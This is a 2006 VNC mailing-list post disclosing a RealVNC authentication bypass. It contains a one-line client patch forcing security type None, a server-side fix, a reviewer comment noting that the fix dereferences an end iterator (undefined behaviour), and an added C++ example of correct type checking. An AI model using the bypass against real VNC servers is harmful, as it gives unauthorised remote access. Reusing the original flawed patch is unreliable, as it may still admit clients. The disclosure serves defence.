On Sat, May 13, 2006 at 12:00:04PM +0100, [EMAIL PROTECTED] wrote:
> Date: Sat, 13 May 2006 01:47:49 -0500
> From: "James Evans" <[EMAIL PROTECTED]>
> To: [email protected]
> Subject: Version 4.1.2
> 
> Kudos for the quick fix! A lot of us are not going to be able to
> install it without the source though. When will it be released? I
> recommend that everyone run VNC behind SSH if possible to mitigate
> these attacks.

I also looked for the source or a patch, but found none of them.
So I started looking for such a bug in the sources.

The following exploit for the client makes the RealVNC server
bypass any VNC authentication:

--- rfb/CConnection.old 2006-05-13 21:56:18.000000000 +0200
+++ rfb/CConnection.cxx 2006-05-13 21:58:10.000000000 +0200
@@ -181,6 +181,7 @@
       }
     }

+    secType=secTypeNone;
     // Inform the server of our decision
     if (secType != secTypeInvalid) {
       os->writeU8(secType);

An exploit for the Java client could be implemented analogously.

The fix for the server is trivial (check that the client response
is in the list of allowed security types):

--- rfb/SConnection.old 2006-05-13 21:58:56.000000000 +0200
+++ rfb/SConnection.cxx 2006-05-13 22:05:43.000000000 +0200
@@ -181,6 +181,17 @@
   vlog.info("Client requests security type %s(%d)",
             secTypeName(secType),secType);

+  std::list<rdr::U8> secTypes;
+  std::list<rdr::U8>::iterator i;
+  securityFactory->getSecTypes(&secTypes, reverseConnection);
+  for (i=secTypes.begin(); i!=secTypes.end(); i++)
+    if (*i == secType)
+      break;
+
+  if (*i != secType)
+    throwConnFailedException("unexpected security type");
+
+
   try {
     state_ = RFBSTATE_SECURITY;
     security = securityFactory->getSSecurity(secType, reverseConnection);
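Review bot: when no offered type matches, the loop leaves `i` equal to `secTypes.end()` and the following `if (*i != secType)` dereferences the end iterator, which is undefined behaviour (it may read garbage that happens to equal `secType` and let the connection through). The rejection should test the iterator itself, e.g. `if (i == secTypes.end()) throwConnFailedException("unexpected security type");`, or replace the hand-written loop with `std::find(secTypes.begin(), secTypes.end(), secType)` and compare its result against `end()`. Minor style point: the two added blank `+` lines before `try {` leave a double blank line; one is enough.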

As these files are shared between Windows and Unix versions, they apply to
both of them (I tested only with the Linux version).

I have not seen any source of version 4.1.2 and have not tested the binary version,
so I do not know if this is the same problem that was fixed in 4.1.2.

Regards, Martin Kögler
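To make the server-side check concrete, here is an added, stand-alone model of the RFB 3.8 security-type negotiation; it is example code written for this page, not from the post above or from the RealVNC sources. It places the unchecked selection (the behaviour the exploit relies on: the server trusts whatever type byte the client returns) beside the hardened one (the chosen type must be in the list the server offered), and it reports "not offered" by comparing against `end()` rather than dereferencing the iterator. The function names `chooseSecTypeUnchecked`, `chooseSecTypeChecked` and `serverAcceptsSecType` are assumptions for this example; the numeric security-type values are the standard RFB ones.

```cpp
// Added example (not from the mailing-list post or the RealVNC sources):
// a stand-alone model of the RFB 3.8 security-type negotiation showing why the
// server must check the client's chosen type against the list it offered.
#include <algorithm>
#include <cstdint>
#include <vector>

// Standard RFB security-type numbers.
const uint8_t secTypeInvalid = 0;
const uint8_t secTypeNone    = 1;
const uint8_t secTypeVncAuth = 2;

// Vulnerable behaviour: the server trusts whatever byte the client sent back,
// so a client that answers secTypeNone skips authentication entirely.
uint8_t chooseSecTypeUnchecked(const std::vector<uint8_t>& offered, uint8_t requested) {
    (void)offered;                      // the offered list is never consulted
    return requested;
}

// Hardened behaviour: the chosen type is accepted only if it was in the list the
// server advertised; anything else is reported as secTypeInvalid so the caller
// can fail the connection. The "not found" case is detected by comparing the
// iterator with end(), never by dereferencing it.
uint8_t chooseSecTypeChecked(const std::vector<uint8_t>& offered, uint8_t requested) {
    std::vector<uint8_t>::const_iterator it =
        std::find(offered.begin(), offered.end(), requested);
    if (it == offered.end())
        return secTypeInvalid;
    return *it;
}

// Models the server's "process security type" step: true means the server
// proceeds with the selected mechanism, false means it must send a
// connection-failed reply instead.
bool serverAcceptsSecType(const std::vector<uint8_t>& offered, uint8_t requested, bool checked) {
    uint8_t chosen = checked ? chooseSecTypeChecked(offered, requested)
                             : chooseSecTypeUnchecked(offered, requested);
    return chosen != secTypeInvalid;
}

int main() {
    // Constructed scenario: a password-protected server offers only VNC auth.
    std::vector<uint8_t> offered;
    offered.push_back(secTypeVncAuth);
    // A client replying with "None" gets in on the unchecked server ...
    bool unchecked = serverAcceptsSecType(offered, secTypeNone, false);
    // ... and is refused by the checked one.
    bool checked = serverAcceptsSecType(offered, secTypeNone, true);
    return (unchecked && !checked) ? 0 : 1;
}
```

The hardened path is the same membership test the server patch adds; using `std::find` and comparing with `end()` avoids the end-iterator dereference that a hand-written search loop can fall into.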
_______________________________________________
VNC-List mailing list
[email protected]
To remove yourself from the list visit:
http://www.realvnc.com/mailman/listinfo/vnc-list
